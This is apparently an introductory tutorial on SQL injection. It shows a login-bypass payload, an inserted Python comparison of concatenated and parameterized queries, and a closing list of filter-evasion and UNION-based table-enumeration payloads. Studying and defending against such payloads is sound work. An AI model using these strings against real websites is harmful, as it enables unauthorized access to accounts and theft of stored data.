SQL Injection
What is SQL?
SQL stands for Structured Query Language.
Most websites use a database to store data.
Data such as usernames, passwords, credit cards, posts and so on are stored in a database.
What is an SQL Injection?
SQL injection is a vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
A successful SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information.
SQL Injection Login Bypassing
In the following example, we try to inject SQL commands to bypass this login.
In this bypass, we put a single quote (') after the password "123456" and use " 'and 1=1# " to inject our SQL command.
The database evaluates 1=1 as true, so we are able to bypass this login page.
After that, we successfully log in as papishampoo.
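The login check described above, as an added example that is not code from the original page: the same check built by string concatenation and with bound parameters, run against the page's input. The `users` table, the in-memory SQLite database and the function names are assumptions made for illustration; SQLite does not treat `#` as a comment, so the page's `#` is swapped for `--`.

```python
import sqlite3

# The page's input (password followed by 'and 1=1#). '#' is a MySQL comment;
# SQLite, used here so the example runs offline, uses '--' instead.
PAGE_INPUT = "123456'and 1=1#"
SQLITE_INPUT = PAGE_INPUT.replace("#", "--")

def make_db():
    # Constructed sample account; plaintext password only to mirror the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('papishampoo', '123456')")
    return db

def login_concatenated(db, username, password):
    # Vulnerable: input becomes part of the SQL text, so its quote closes the
    # string literal and whatever follows is parsed as SQL.
    sql = ("SELECT 1 FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # the input produced malformed SQL

def login_parameterized(db, username, password):
    # Hardened: placeholders send the input as data; it is never parsed as SQL.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def compare(password):
    # Returns (concatenated result, parameterized result) for one password.
    db = make_db()
    try:
        return (login_concatenated(db, "papishampoo", password),
                login_parameterized(db, "papishampoo", password))
    finally:
        db.close()

if __name__ == "__main__":
    for pw in ("123456", "wrong", SQLITE_INPUT):
        print(repr(pw), compare(pw))
```

The two functions agree on ordinary passwords and differ only on the injected input: the concatenated query accepts a string that is not the stored password, while the parameterized query compares it literally and rejects it.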
More information and examples in the SQL Injection page.
Bypassing Filters
Bypass blacklisted spaces:
+
/**/
comment = %23
Bypassing queries:
uNiOn+SElect+1,2+%23
UniOn/**/SeLecT/**/%23
Example:
-1'UniOn/**/SeLecT/**/1,table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/=/**/' <table_name> '%23